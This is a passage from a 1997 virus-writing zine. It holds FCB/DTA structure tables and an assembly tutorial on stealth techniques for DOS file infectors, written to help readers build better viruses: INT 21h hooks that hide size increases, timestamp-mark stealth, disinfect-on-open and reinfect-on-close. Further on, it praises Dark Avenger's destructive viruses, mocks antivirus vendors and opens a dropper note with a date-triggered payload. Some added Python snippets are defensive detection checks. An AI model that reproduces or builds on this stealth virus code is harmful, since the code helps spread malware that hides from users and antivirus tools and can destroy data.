 0Eh    WORD     logical record size
 10h    DWORD    file size
 14h    WORD     date of last write (see #0952 at AX=5700h)
 16h    WORD     time of last write (see #0951 at AX=5700h) (DOS 1.1+)
 18h  8 BYTEs    reserved (see #0649,#0650,#0651,#0652,#0653)
 20h    BYTE     record within current block
 21h    DWORD    random access record number (if record size is > 64 bytes, high byte is omitted)

Note: to use an extended FCB, you must specify the address of the FFh flag at offset -7, rather than the address of the drive number field.

Format of FCB reserved field for DOS 3.x:

Offset  Size     Description                                  (Table 0652)
 18h    BYTE     number of system file table entry for file
 19h    BYTE     attributes
                 bits 7,6: 00 = SHARE.EXE not loaded, disk file
                           01 = SHARE.EXE not loaded, character device
                           10 = SHARE.EXE loaded, remote file
                           11 = SHARE.EXE loaded, local file or device
                 bits 5-0: low six bits of device attribute word
---SHARE.EXE loaded, local file---
 1Ah    WORD     starting cluster of file on disk
 1Ch    WORD     (DOS 3.x) offset within SHARE of sharing record (see #0924 at AH=52h)
 1Eh    BYTE     file attribute
 1Fh    BYTE     ???
---SHARE.EXE loaded, remote file---
 1Ah    WORD     number of sector containing directory entry
 1Ch    WORD     relative cluster within file of last cluster accessed
 1Eh    BYTE     absolute cluster number of last cluster accessed
 1Fh    BYTE     ???
---SHARE.EXE not loaded---
 1Ah    BYTE     (low byte of device attribute word AND 0Ch) OR open mode
 1Bh    WORD     starting cluster of file
 1Dh    WORD     number of sector containing directory entry
 1Fh    BYTE     number of directory entry within sector

Note: if the FCB is opened on a character device, the DWORD at 1Ah is set to the address of the device driver header, then the BYTE at 1Ah is overwritten.

Format of FCB reserved field for DOS 5.0:

Offset  Size     Description                                  (Table 0653)
 18h    BYTE     number of system file table entry for file
 19h    BYTE     attributes
                 bits 7,6: 00 = SHARE.EXE not loaded, disk file
                           01 = SHARE.EXE not loaded, character device
                           10 = SHARE.EXE loaded, remote file
                           11 = SHARE.EXE loaded, local file or device
                 bits 5-0: low six bits of device attribute word
---SHARE.EXE loaded, local file---
 1Ah    WORD     starting cluster of file on disk
 1Ch    WORD     unique sequence number of sharing record
 1Eh    BYTE     file attributes
 1Fh    BYTE     unused???
---SHARE.EXE loaded, remote file---
 1Ah    WORD     network handle
 1Ch    DWORD    network ID
---SHARE not loaded, local device---
 1Ah    DWORD    pointer to device driver header
 1Eh  2 BYTEs    unused???
---SHARE not loaded, local file---
 1Ah    BYTE     extra info
                 bit 7: read-only attribute from SFT
                 bit 6: archive attribute from SFT
                 bits 5-0: high bits of sector number
 1Bh    WORD     starting cluster of file
 1Dh    WORD     low word of sector number containing directory entry
 1Fh    BYTE     number of directory entry within sector

Format of FindFirst data block (taken from Ralf's Interrupt list)

Offset  Size     Description                                  (Table 0913)
---PC-DOS 3.10, PC-DOS 4.01, MS-DOS 3.2/3.3/5.0---
 00h    BYTE     drive letter (bits 0-6), remote if bit 7 set
 01h 11 BYTEs    search template
 0Ch    BYTE     search attributes
---DOS 2.x (and some DOS 3.x???)---
 00h    BYTE     search attributes
 01h    BYTE     drive letter
 02h 11 BYTEs    search template
---WILDUNIX.COM---
 00h 12 BYTEs    15-character wildcard search pattern and drive letter (packed)
 0Ch    BYTE     search attributes
---DOS 2.x and most 3.x---
 0Dh    WORD     entry count within directory
 0Fh    DWORD    pointer to DTA???
 13h    WORD     cluster number of start of parent directory
---PC-DOS 4.01, MS-DOS 3.2/3.3/5.0---
 0Dh    WORD     entry count within directory
 0Fh    WORD     cluster number of start of parent directory
 11h  4 BYTEs    reserved
---all versions, documented fields---
 15h    BYTE     attribute of file found
 16h    WORD     file time (see #0951 at AX=5700h)
 18h    WORD     file date (see #0952 at AX=5700h)
 1Ah    DWORD    file size
 1Eh 13 BYTEs    ASCIZ filename+extension

The strategy for semi-stealth is very simple.
1. Allow the necessary call for the operating system.
2. If an error occurred, bail out of the interrupt.
3. Get the actual DTA.
4. Is the file executable? If it isn't, return from the interrupt.
5. Check the file for infection. If the file is not infected, return from the interrupt.
6. Cut the file size in the DTA and leave the handler.

int_21:
        ....
        cmp     ah,11h                  ; this is a part of viral
                                        ; INT 21h handler
        je      DIR_STEALTH
        cmp     ah,12h
        je      DIR_STEALTH
        cmp     ah,4eh
        je      DTA_STEALTH
        cmp     ah,4fh
        je      DTA_STEALTH
        ....                            ; here handler continues

DIR_STEALTH:
        call    dos_emu                 ; call original DOS handler of
                                        ; INT 21h
        pushf
        pusha
        push    ds
        push    es
        or      al,al                   ; was the call successful?
        jnz     exit_size_fcb
        mov     ah,2fh
        call    dos_emu                 ; get DTA address to ES:BX
        push    es
        pop     ds
        cmp     byte ptr [bx],0ffh      ; extended FCB ?
        jne     FCB_not_extended
        add     bx,7                    ; skip the 7-byte extended prefix
FCB_not_extended:
        call    test_4_executable
        jc      exit_size_fcb           ; if not executable, exit
        call    test_4_infection
        jc      exit_size_fcb           ; if not infected, exit
        call    test_min_size
        jc      exit_size_fcb           ; skip too small files
        sub     word ptr [bx+1dh],virus_size   ; size is at 1Dh: drive byte
        sbb     word ptr [bx+1fh],0            ; + 32-byte directory entry
exit_size_fcb:
        pop     es
        pop     ds
        popa
        popf
        retf    2

DTA_STEALTH:
        call    dos_emu                 ; call original DOS handler of
                                        ; INT 21h
        pushf
        pusha
        push    ds
        push    es
        or      al,al                   ; was the call successful?
        jnz     exit_size_dta
        mov     ah,2fh
        call    dos_emu                 ; get DTA address to ES:BX
        push    es
        pop     ds
        call    test_4_executable
        jc      exit_size_dta           ; if not executable, exit
        call    test_4_infection
        jc      exit_size_dta           ; if not infected, exit
        call    test_min_size
        jc      exit_size_dta           ; skip too small files
        sub     word ptr [bx+1ah],virus_size   ; DTA file size DWORD at 1Ah
        sbb     word ptr [bx+1ch],0
exit_size_dta:
        pop     es
        pop     ds
        popa
        popf
        retf    2


As you may have noticed, the code for DTA_STEALTH and DIR_STEALTH shares a lot of the same stuff, and it could be coded as one routine.
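The two handlers above subtract virus_size at different offsets because the two DOS search calls return different records into the DTA. The Python below, added here as an example and not part of the zine, parses both record layouts from the tables above and then does what an anti-stealth "cross-view" check does: it compares the size a directory listing reports with a size obtained by another path (seeking to EOF on an open handle, or reading the raw directory). The records, the file names and the sizes are constructed sample values.

```python
import struct

# Added example, not from the zine: decode the two search-result records that
# DOS writes into the DTA, then cross-check listed sizes against measured ones.

def parse_find_dta(dta: bytes) -> dict:
    """INT 21h/4Eh,4Fh result (Table 0913, documented fields):
    15h attr, 16h time, 18h date, 1Ah size, 1Eh ASCIZ name."""
    attr, ftime, fdate, size = struct.unpack_from("<BHHI", dta, 0x15)
    name = dta[0x1E:0x1E + 13].split(b"\0", 1)[0].decode("ascii")
    return {"name": name, "attr": attr, "time": ftime, "date": fdate, "size": size}


def parse_fcb_search_record(dta: bytes) -> dict:
    """INT 21h/11h,12h result: optional 7-byte extended-FCB prefix (FFh flag,
    5 reserved bytes, attribute), a drive byte, then a 32-byte directory entry.
    The size therefore lands at 1Dh (24h with the prefix), which is why the
    DIR_STEALTH handler uses [bx+1Dh] after its 'add bx,7'."""
    off = 7 if dta[0] == 0xFF else 0
    drive = dta[off]
    entry = dta[off + 1:off + 33]
    base = entry[0:8].decode("ascii").rstrip()
    ext = entry[8:11].decode("ascii").rstrip()
    ftime, fdate, cluster, size = struct.unpack_from("<HHHI", entry, 0x16)
    return {"name": f"{base}.{ext}" if ext else base, "drive": drive,
            "attr": entry[0x0B], "time": ftime, "date": fdate,
            "cluster": cluster, "size": size}


def cross_view_check(listed: dict, measured: dict) -> list:
    """Return (name, listed_size, measured_size) for every file whose
    directory-listing size disagrees with a size measured by another route."""
    return [(name, listed[name], measured[name])
            for name in sorted(listed)
            if name in measured and listed[name] != measured[name]]


# --- constructed sample records ---------------------------------------------
def make_find_dta(name: str, size: int, attr: int = 0x20,
                  ftime: int = 0x6B2E, fdate: int = 0x22A1) -> bytes:
    rec = bytearray(43)                       # 00h..14h undocumented, left zero
    struct.pack_into("<BHHI", rec, 0x15, attr, ftime, fdate, size)
    rec[0x1E:0x1E + len(name) + 1] = name.encode("ascii") + b"\0"
    return bytes(rec)


def make_fcb_record(name: str, size: int, extended: bool, drive: int = 3,
                    attr: int = 0x20, ftime: int = 0x6B2E, fdate: int = 0x22A1,
                    cluster: int = 0x0123) -> bytes:
    base, _, ext = name.partition(".")
    entry = bytearray(32)
    entry[0:11] = f"{base:<8}{ext:<3}".encode("ascii")
    entry[0x0B] = attr
    struct.pack_into("<HHHI", entry, 0x16, ftime, fdate, cluster, size)
    prefix = b"\xFF" + b"\0" * 5 + bytes([attr]) if extended else b""
    return prefix + bytes([drive]) + bytes(entry)


# what a hooked FindFirst/FindNext would show (TEST.COM listed 1800 bytes short)
LISTED = {r["name"]: r["size"] for r in (
    parse_find_dta(make_find_dta("TEST.COM", 3251)),
    parse_find_dta(make_find_dta("CLEAN.EXE", 40960)),
)}
MEASURED = {"TEST.COM": 5051, "CLEAN.EXE": 40960}   # constructed "other view"

if __name__ == "__main__":
    print(parse_fcb_search_record(make_fcb_record("TEST.COM", 3251, extended=True)))
    print(cross_view_check(LISTED, MEASURED))   # [('TEST.COM', 3251, 5051)]
```

The mismatch list is the whole point: a hook that only patches the search records (points A and B above) leaves every other route to the size untouched, and the difference it produces is exactly the length it is trying to hide.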

B. Mark-stealth

To demonstrate the stealth of the infection mark, here is a piece of code. It was designed for a virus which uses seconds = 28 in the timestamp as its mark. This handler doesn't cover the situation where someone tries to get the timestamp. In the case of a complex approach this situation can be handled too. But the user most likely will not notice any change ... And so this code seems to be optimal.

int_21:
        ....
        cmp     ah,57h                  ; this is a part of viral
                                        ; INT 21h handler
        je      fn_time
        ....                            ; here handler continues

fn_time:
        or      al,al                   ; get time ?
        je      bye1                    ; that we don't handle
        pusha
        push    es
        call    test_4_executable
        jc      fn_time_exit0           ; not executable, skip
        push    cx
        call    get_time
        jnc     uninfected              ; infected ?
        pop     cx                      ; yes
        mov     ax,cx
        and     ax,1fh                  ; seconds field (seconds/2)
        xor     ax,0eh
        je      fn_time_exit0           ; 28 seconds ? then let him do it
        pop     es
        popa
        push    cx
        and     cl,11100000b            ; clear the seconds field
        or      cl,0eh                  ; 0Eh = 28 seconds (the text had
                                        ; "xor cl,0f", which gives 30 seconds)
        jmp     set_28                  ; otherwise set always 28
fn_time_exit0:
        pop     es
        popa
        jmp     bye1
uninfected:
        pop     cx
        mov     ax,cx
        and     ax,1fh
        xor     ax,0eh                  ; set 28 seconds ?
        jnz     fn_time_exit0           ; no, exit
set_26:
        pop     es
        popa
        push    cx
        dec     cx                      ; set 26 seconds
set_28:
        call    dosemu
        pop     cx                      ; but show 28
        retf    2                       ; flags from dosemu are returned as they
                                        ; are (no pushf was done in this path)

bye1:   jmp     dword ptr cs:[original_INT21h]

C. Full stealth


Semi-stealth is a must for full stealth virii. To get a working full stealth virus, there are two different ways:

   desinfection on open / reinfection on close type stealth
   true full stealth

It is a known fact that coding a virus of the first type is much easier than coding a virus of the second type. Coding viruses of both types requires some experience, so the code which 'll follow is my well known "meta code".

Desinfection on open / Reinfection on close.

Here the desired behaviour is not only desinfection on open and reinfection on close, but also desinfection on 4B01h - load and do not execute, which is used by some debuggers to load a file into memory. Just for lamers I point to 2 important things:

   after desinfecting the file, you have to lseek to the BOF !
   reinfection is prior to file close !

int_21:
        ....
        cmp     ah,3dh                  ; this is a part of viral
                                        ; INT 21h handler
        je      desinfect
        cmp     ah,3eh
        je      reinfect
        cmp     ah,4bh
        je      infect_file
        ....                            ; here handler continues

infect_file:
        pusha
        push    ds
        push    es
        or      al,al                   ; 4B00h ?
        jnz     next
        call    get_bastard             ; infect file
exit_exec:
        pop     es
        pop     ds
        popa
        jmp     dword ptr cs:[original_INT21h]

next:
        dec     ax
        jnz     exit_exec               ; neither 4B00h nor 4B01h
        call    open_file_DS_DX         ; 4B01h
        call    desinfect1
        jmp     short exit_exec

get_bastard:
        ....                            ; stuff deleted
        call    open_file_DS_DX
        jc      exit_infect
get_bastard_handle:
        ....                            ; file infection here
        ....
exit_infect:
        ret

desinfect:
        call    open_file_DS_DX
        pushf
        pusha
        push    ds
        push    es
        call    desinfect1
        pop     es
        pop     ds
        popa
        popf
        retf    2

desinfect1:
comment ~

Here you have to read the saved stuff from the infected file to some memory buffer. Then truncate the file to its uninfected size (by writing 0 bytes to the file with the file pointer set to the location where the uninfected file had its EOF). And last, restore the changed stuff from the memory buffer and lseek to the start of the file. Do not forget: if you always open the file with mode R/W for any DOS call, you may avoid nasty SFT manipulation when reinfecting the file on its closing.

~
        .....                           ; some code :))))

The situation before the file is closed is simple... We do not have the file name, but we have the file handle. So we can use the part of the code which is designed to infect files on execution.

reinfect:
        pusha
        push    ds
        push    es
        call    lseek_BOF
        call    get_bastard_handle
        jmp     exit_exec               ; (the text had "exec_exit", a typo)

True full stealth

This is the most difficult task for every coder (besides some kick-the-ass poly engine). As this problem is very complex, I 'll only explain what one should do on all critical DOS functions.

INT 21h / 4E,4F,11,12

Do just normal semi-stealth. But be careful. In some cases it is necessary to switch stealth off. Such a case is e.g. the call of INT 21h/32h - Get DOS drive parameter block. Such a call is used by software like CHKDSK (we all know this program is unfriendly to stealth viruses). To switch stealth on again, just wait for INT 21h/4Ch.

INT 21h / 4B01h,40h

This is no problem at all. Just desinfect the file. If you are using stealth with SFT manipulation (SFT stealth), you 'll have some minor (for someone major) problem. But the help is simple - refer to my "SFT stealth tutorial" for an elegant solution. This tutorial you can find in Insane Reality #8.

INT 21h / 3Dh

If you are using SFT stealth, just cut the filesize in the SFT here. Then noone can seek to the virus body, because DOS thinks there is EOF in the location where EOF was before the virus body was appended. Otherwise do nothing.


INT 21h / 42h

Do not allow seeking within the virus body. You have to correct all seeking relative to the uninfected filesize. Do not forget to handle all the methods (0,1,2). In other words, just manipulate CX and DX.

INT 21h / 3Fh

This 'll be the most difficult part of the code. First check where the file pointer is located. Just for better imagination, an infected file looks like shown here:

If the file pointer is within the "changed stuff", read into the caller's memory buffer the data which should be there if the file wasn't infected (from the file pointer position to the end of the "changed stuff"). Then read the rest of the requested amount of bytes. Any reading in the area marked as "rest of infected file" is not dangerous. But if you detect that the read can reach the virus body, cut the read to the "legal" size. (If you 're using SFT stealth, you do not need to handle this. For DOS, the viral body doesn't exist :)))).

INT 21h / 4Ch

Here you can control the execution of some programs. When you want to be sure that some program really ends, you can do it like this.

   on INT 21h/4Bh check the program name and store the current PID, which is the same as the PSP segment of the current process.

   on INT 21h/4Ch compare the parent's PID (PSP:16) in the current PSP (you can get the current PSP via mov ah,51h / int 21h, result in BX) with the stored one. If these two values are the same, the program ends.

INT 21h / 57h

Here you can stealth the changes in the time stamp. Do not allow setting the stamp to the "mark" value, and you can avoid returning the "mark" value on INT 21h / 5700h.

D. MCB stealth

This part is very short. If you want to know the principles and basics, refer to MCB stealth by Darkman in VLAD #6.

Conclusions


A. Pro - stealth

   stealth effectively hides the presence of the virus in infected files
   in some cases a stealth virus can spread faster with some lame AV software (in the past, not now)

B. Contra - stealth

   the majority of stealth viruses can be caught in memory by a simple scanstring
   combining full stealth with variable length poly is a very hard task
   every stealth virus gives an exact tutorial how to remove itself. And this is a very, very pity.

C. Solution:

The solution is TST. TST is a trade mark owned by Online. TST is Copyright (C) 1995-96 by Terror-6. But I am afraid you 'll have to wait for Terror's next virus.

Some form of stealth is good at the beginning of infection. It helps to spread the virus. But on the other hand, stealth has some major disadvantages.

Download attached files here


This little contribution is dedicated to the eternal memory of THE DARK AVENGER (dedicated to the probably upcoming 26th birthday of this legend (or Diana's ?)

[ Text in these two lines above is pure speculation. Editor ]

When somebody says computer virus, it 'll not take a long time to say the name Dark Avenger. You ask why? If you do not know, you probably suffer from dementia or something like it. You should know that Dark Avenger is the best known virus writer since the whole vx scene started in the late '80s.

It's well known that Dark Avenger is a native Bulgarian, from the town of Sofia, and a fan of the band Iron Maiden. But probably the only one who knows Dark Avenger's real identity is Dark Avenger himself. There were some rumors that the real name of Dark Avenger is Vesselin Bontchev, who now resides "on some lonely island in the northern Atlantic", but Mr. Bontchev, as well as the Dark Avenger, are both of the same opinion:

Bontchev != Dark Avenger

[reason in Bontchev's case is very easy to understand.:) ]

It's also well known that the relationship of Dark Avenger to Vesselin could be described as disrespect, or rather very negative. At least one of the variants of the Dark Avenger virus targets programs containing the string 'Vesselin Bontchev' and causes a system hang if such a program is run. Moreover, sometimes Dark Avenger used the expression "the weasel" when he talked about Bontchev. But we have to say that without Bontchev, Dark Avenger would not be so "popular" and well known in the whole world. In fact, Bontchev is the man who is responsible for the worldwide publicity of Dark Avenger. The legend himself claimed that Bontchev made him into Dark Avenger. Moreover, it should be Bontchev who encouraged people to create viruses by some of his articles and publications. According to Dark Avenger, some stuff written by Bontchev can be a good tutorial for those people who want to code viruses and have no other information available.

But as I don't want to get off the topic, here is a brief history of Dark Avenger's career as a virus writer.

Some 9 or 10 years ago, when there were not so many viruses out, one young Bulgarian boy was interested in the rather mysterious and not so well known area of computer science - the viruses. He thought of "making a program that would travel on its own .. and to get to the places its creator could never go". After reading articles which discussed computer viruses he decided to write such a piece of code. He started work on his first virus in September 1988. Occasionally he had access to a 4.77 MHz XT with no harddisk. As he finished the virus, he added destructive code to it, because he had no idea what else he should put in. He thought the virus 'll never travel outside the city. Errare humanum est - to make errors is human. Dark Avenger was wrong in this case. His 651 bytes long virus, which contained the string 'Eddie lives', arrived in spring 1989 in the USA.

Technically, the Eddie.651 virus is a simple TSR with hooked INT 21h, infecting both EXE and COM files on their execution. An infected file is marked within the timestamp - the seconds value is set to 62. Besides the INT 21h function EXEC the virus hooks also the functions FIND_FIRST_FCB and FIND_NEXT_FCB. These functions are called on the DOS command DIR. And if such a call occurs, the virus subtracts its size from the size of every file with the seconds field in the timestamp set to 62. As the virus doesn't check the size of such a file, if the file is smaller than 651 bytes, DIR shows a filesize in the gigabytes range. The virus contains, as said before, the string 'Eddie lives'.
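Two things in that description can be checked from the defender's side without knowing anything about the virus code: a seconds value of 62 cannot be produced by a normal DOS write (the packed time word stores seconds/2 in five bits, so field values above 29 are impossible), and an unchecked 32-bit subtraction is what turns a small file into a "gigabytes" entry. The Python below is an added example, not part of the zine; it also covers the seconds = 28 mark from the mark-stealth section earlier, which, being a legal value, can only be reported as "matches a known mark" and never proven. The directory entries are constructed sample values.

```python
# Added example, not from the zine: DOS packed-time decoding, an "impossible
# seconds" check for timestamp infection marks, and the size underflow that
# makes a semi-stealth DIR hook report gigabyte-sized files.

def encode_dos_time(hour: int, minute: int, second: int) -> int:
    """Pack h:m:s into the 16-bit DOS time word (bits 15-11 h, 10-5 m, 4-0 s/2).
    'second' may be an out-of-range value such as 62 to build a marked entry."""
    return ((hour & 0x1F) << 11) | ((minute & 0x3F) << 5) | ((second // 2) & 0x1F)


def decode_dos_time(word: int) -> tuple:
    """Return (hour, minute, second) as DOS would display them."""
    return (word >> 11) & 0x1F, (word >> 5) & 0x3F, (word & 0x1F) * 2


def seconds_field(word: int) -> int:
    return word & 0x1F


def is_impossible_seconds(word: int) -> bool:
    """Field values 30 and 31 (60 and 62 s) never come from a normal write."""
    return seconds_field(word) > 29


def stealth_listed_size(real_size: int, virus_len: int) -> int:
    """What a DIR hook shows after subtracting virus_len from a 32-bit size
    without checking that the file is at least that long."""
    return (real_size - virus_len) & 0xFFFFFFFF


KNOWN_MARKS = {62: "Eddie.651 style (seconds = 62)",
               28: "seconds = 28 mark from the mark-stealth handler above"}


def classify(entries: list) -> list:
    """entries: (name, time_word). Returns (name, 'hh:mm:ss', verdict)."""
    out = []
    for name, word in entries:
        h, m, s = decode_dos_time(word)
        if is_impossible_seconds(word):
            verdict = "IMPOSSIBLE timestamp, " + KNOWN_MARKS.get(s, "unknown mark")
        elif s in KNOWN_MARKS:
            verdict = "legal value, but matches: " + KNOWN_MARKS[s]
        else:
            verdict = "normal"
        out.append((name, f"{h:02d}:{m:02d}:{s:02d}", verdict))
    return out


# constructed sample directory entries
SAMPLE = [
    ("EDITOR.COM", encode_dos_time(9, 15, 62)),   # marked by an Eddie-style infector
    ("GAME.EXE", encode_dos_time(14, 2, 28)),     # legal, but equals the 28 s mark
    ("NOTES.TXT", encode_dos_time(14, 2, 16)),    # ordinary
]

if __name__ == "__main__":
    for row in classify(SAMPLE):
        print(row)
    # a 300-byte file listed by a hook that blindly subtracts 651:
    print(stealth_listed_size(300, 651))          # 4294966945, about 4 GB
```

An "impossible" timestamp is a strong indicator because nothing legitimate writes it; the 28-second mark is exactly the kind of legal value the mark-stealth handler is built around, which is why that section concludes the user "will not notice any change".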

Dark Avenger's next production is well known - the Dark Avenger virus family with members 1800, 2000 and 2100 bytes long. All 3 members of this family are resident Com'n'Exe infectors. The new idea in this family was the "fast infector" - files were infected not only when executed, but also when opened, closed, created or their attributes changed. Not so new was the payload - when some conditions were met, the virus overwrote sectors on the harddisk at random. Really cruel. There were also some texts in these viruses...

[ofcos, every virus should have some texts, otherwise it gets a name like 4096 or 193257609 :) ]

Dark Avenger.1800:

Eddie lives...somewhere in time
This program was written in the city of Sofia (C) 1988-89 Dark Avenger

As described above, Dark Avenger loves Vesselin Bontchev so much that he included in Dark Avenger.2000 the following lovely text string:

(C) 1989 by Vesselin Bontchev

And as the final nail, if the program to be run contains the string "Vesselin Bontchev", the virus hangs the system. In my humble opinion, Dark Avenger tried here to make Bontchev's life hell with such an overkill payload. Ofcos, the nice stuff with trashing sectors on the harddisk has not been removed from the viral code. As for the 2100 bytes variant, it has some improvements in hiding the size increase of infected programs and so on. Sources released by the author are included in this issue of our zine.

After some time, Dark Avenger released something absolutely unknown to the world. Another first of his was the hyped Mte - the first ever poly engine.

[Washburn's "exercises" I do not count, sorry ... ]


Polymorphism was something new at such a level [ :) ]. Mr. Skulason (if I remember, responsible for fuckprot or whatsoever) wrote in Virus Bulletin in April '92 that Mte should be "a torture test for R&D departments of all the antivirus companies". Moreover the editor of the Virus Bulletin noticed that "Dark Avenger tech support is presumably better than offered by certain anti-virus vendors". He he he : )))))))

There were two releases of the Mte. In August 1991 Mte 0.91β was released and in April 1992 Mte 1.00β. The antivirus vendors were for a long time not able to detect Mte with 100% reliability. Detection rates ranged from 0% in the case of Xtree's Allsafe v.4.1, or even worse, hanging the computer in the case of CPAV and CPAVSOS v.14, to full 100% detection in the case of IBM antivirus, F-prot, TBAV and many others.

Another of Dark Avenger's firsts in the world was the COMMANDER BOMBER virus. At the time of its appearance, a substantial part of AV programs didn't follow the code flow, they just scanned for signatures near the file beginning and the file end. And now imagine the surprise of those so called virus researchers that some bloody virus is out which is not only inserted somewhere in the middle of the file, but also a couple of islands of code bound with calls and jmps lead to the virus body. [ I would like to see their faces in that historical moment ]. But in medias res .... COMMANDER BOMBER is an inserting COM infector. Its own body is 22596 bytes long, but the added code is actually 4096 bytes long. The virus infects COM files on their execution, if their size is greater than 5120 bytes and less than 61183 bytes. COMMAND.??? 'll never be infected. The virus selects a 4 KB long block in the file and this block is appended to the file. In this gap the viral code 'll be placed. Then the virus generates some kind of garbage code which brings the processing to the main virus code. The only thing the garbage generation wat­ches is the stack and the SP value. But, unfortunately, the garbage code generation seems to be buggy (about 1 of 8 samples generated is not able to work). This may also be the reason why COMMANDER BOMBER wasn't so successful when we compare it with other Dark Avenger's viruses. This virus has also another interesting feature - absolutely no signature in files. But the files do not become infected over and over again. This is handled by a very simple trick. When an infected file is to be executed, the virus saves its memory image to disk and then repairs and executes it. So if the file is infected twice, the second infection rebuilds the file as it was with only one infection. And this first infection saves to disk the file infected only once. It is a very handy trick, and you can try to code something like this....
Just for your information, Jim Bates, the man who is probably responsible for the fate of Black Baron of England (aka Christopher Pile), had the feeling that "although there are similarities of style, ... [stuff deleted] ... that code is beyond his [ Dark Avenger's ] limited capabilities."
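The lesson of the COMMANDER BOMBER story for a scanner is that code reached through a chain of jumps and calls is invisible to a head/tail-only signature search. The Python below is an added example, not the zine's code and not related to the real virus: a toy tracer that follows only unconditional JMP/CALL/RET (opcodes E9h, EBh, E8h, C3h) from the entry of a constructed COM image and reports which file offsets receive control, compared with a fixed head/tail scan window. The island offsets, the "BODY" marker and the window sizes are made-up sample values.

```python
# Added example, not from the zine: follow the unconditional control-flow chain
# from a COM entry point so that mid-file code islands are located, and compare
# with a head/tail-only scan window.

def trace_entry_flow(image: bytes, entry: int = 0, limit: int = 64) -> list:
    """Return the file offsets that receive control when following JMP rel16
    (E9h), JMP rel8 (EBh), CALL rel16 (E8h) and RET (C3h) from 'entry'.
    Any other opcode ends the trace; this is deliberately a toy, not a CPU."""
    path, calls, pos = [], [], entry
    while len(path) < limit and 0 <= pos < len(image) and pos not in path:
        path.append(pos)
        op = image[pos]
        if op == 0xE9 and pos + 3 <= len(image):          # JMP rel16
            pos = pos + 3 + int.from_bytes(image[pos + 1:pos + 3], "little", signed=True)
        elif op == 0xEB and pos + 2 <= len(image):        # JMP rel8
            pos = pos + 2 + int.from_bytes(image[pos + 1:pos + 2], "little", signed=True)
        elif op == 0xE8 and pos + 3 <= len(image):        # CALL rel16
            calls.append(pos + 3)
            pos = pos + 3 + int.from_bytes(image[pos + 1:pos + 3], "little", signed=True)
        elif op == 0xC3 and calls:                        # RET to the pending caller
            pos = calls.pop()
        else:
            break
    return path


def in_scan_window(offset: int, size: int, head: int = 1024, tail: int = 1024) -> bool:
    """True if a head/tail-only scanner would look at this offset at all."""
    return offset < head or offset >= size - tail


def unscanned_landing_points(image: bytes, **window) -> list:
    """Offsets reached by the flow trace that a head/tail scan never inspects."""
    return [p for p in trace_entry_flow(image)
            if not in_scan_window(p, len(image), **window)]


# --- constructed sample image ---------------------------------------------------
def _rel(opcode: bytes, frm: int, to: int, width: int) -> bytes:
    """Encode a relative jump/call of 'width' displacement bytes from frm to to."""
    return opcode + (to - (frm + 1 + width)).to_bytes(width, "little", signed=True)


def build_sample(size: int = 8192) -> bytes:
    """Entry jumps to an island at 3000, which calls 5000 (returns), hops via a
    short jump to 3021 and jumps on to the 'body' at 6000. All values made up."""
    img = bytearray(b"\x90" * size)                        # NOP filler ends the trace
    img[0:3] = _rel(b"\xE9", 0, 3000, 2)
    img[3000:3003] = _rel(b"\xE8", 3000, 5000, 2)
    img[5000:5001] = b"\xC3"
    img[3003:3005] = _rel(b"\xEB", 3003, 3021, 1)
    img[3021:3024] = _rel(b"\xE9", 3021, 6000, 2)
    img[6000:6004] = b"BODY"                               # stand-in for the island
    return bytes(img)


if __name__ == "__main__":
    sample = build_sample()
    print(trace_entry_flow(sample))            # [0, 3000, 5000, 3003, 3021, 6000]
    print(unscanned_landing_points(sample))    # [3000, 5000, 3003, 3021, 6000]
```

Every landing point outside the head/tail window is a place where a signature search that "just scanned near the file beginning and the file end" would have found nothing; a real scanner extends the same idea with a proper decoder and an emulator, but the control-flow following is what matters.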

In my humble opinion, COMMANDER BOMBER has two main weak points.

The first weak point is the garbage generation. Invalid opcodes are not very good in virus code, everyone should avoid them. Otherwise there is ABSOLUTELY no chance to enter the "In the wild list".

The second weak point of this virus is the lack of encryption or a poly engine. It could be a very hard to defeat virus if Dark Avenger had combined Mte polymorphism and the COMMANDER BOMBER midfile infection. But viruses of later years used such a combination and this led to the very successful One_Half virus by Vyvojar. Sources are included in this issue.

But as not everyone has the necessary abilities, *-Zine is proud to present you the disassembly of this famous virus. Enjoy it.


Download attached files here

Resources used to write this article:

   brain
   own archive
   old issues of Virus Bulletin
   Cicatrix's VDAT 1.8, which is quite good IMHO
   interview with Dark Avenger by Sara Gordon
   1 pizza from my favourite pizzeria
   2 bottles of beer
   1 pack of chips

The author is not responsible for the bugs in the article. Moreover the author is not responsible at all.

Especially 4 Sara G.: What the fuck was the joke with the anorak?

This article is (c) 1997 by the *-Zine. Any use of it in whatever form is prohibited without explicit written permission of the *-Zine staff members. Eventual violation of this restriction will be subject to prosecution. All the legal costs of the *-Zine staff 'll be paid by the prosecuted.


This is just a little article to keep you informed.

The big world of business is ruled by just one golden rule. This rule is very simple. Big fish eat smaller ones! Only in some exceptional cases can a small fish eat a bigger one. The latest victim of this rule has a well known name, especially in the virus underground. Because I wanna tell you its name. Read my lips ....

TBAV, Thunderbyte Antivirus, produced by ESSaV B.V., a Netherlands based company, is no longer independent! As stated by TBAV officials, TBAV "decided to become a part of NORMAN Group". In plain text Norman bought up the TBAV technology and research team. This fact means not only the change of the product name to Norman Thunderbyte Virus Control, but also probably new and more aggressive advertising for the product.

And this advertising makes me laugh. Just for illustration, some quotations from Norman Data Defense Systems materials.

... Norman Thunderbyte Virus Control never becomes obsolete. [but they provide updates every two months ]

... Norman Thunderbyte Virus Control is always one step ahead of the virus writing community [ I think this 'll be the joke of the year, or am I not right ? :)))) ]

... Norman Thunderbyte Virus Control is one of the few virus scanners able to understand OLE2 format ... This means full detection capability of Macroviruses, even encrypted ones ! [ Just check out the Slovak_Dictator Macrovirus in another place in this issue to get the corrected opinion :))) ]

... cleaning utility, which enables all users to quickly and effectively remove all macroviruses. [ I want to see it, dudes :) ]

Historia est magistra vitae. In the past we had a shitload of tricks how to piss off TBAV, how to deactivate its resident driver etc ... In the past there always were (and always 'll be) viruses which forced AVers to change their products more or less. TBAV was no exception. And they should be one step ahead? Stop kidding! We will see...


And here is an almost complete Intel opcode table. We bring it to you as some kind of help for your attempts to code a new, kick-the-ass poly engine.

Editors

Download here!

Hi dudez! Here I present to the community the result of my work. Basically, these tables are based on opcodes.lst from Ralph's list. All I did is just their transcription to this form. As it took quite a long time, I hope you will use it and enjoy it.

MGL

Just a marginal notice from the 1999 position - the table I prepared in 1997 has unfortunately some minor bugs. Some other ppl took over the table and didn't notice it, exactly as I didn't .... So is the life ... :)))))


Hi guys.

I decided to update Quark's ARJ Dropper for RAR dropping. I think what archive infection have feature at every OS, so I want to include ZIP and LHA dropping to the next release of *-Zine. What this code does and what not.

At first it checks if today is some day of August. On this "some" day it launches my payload.

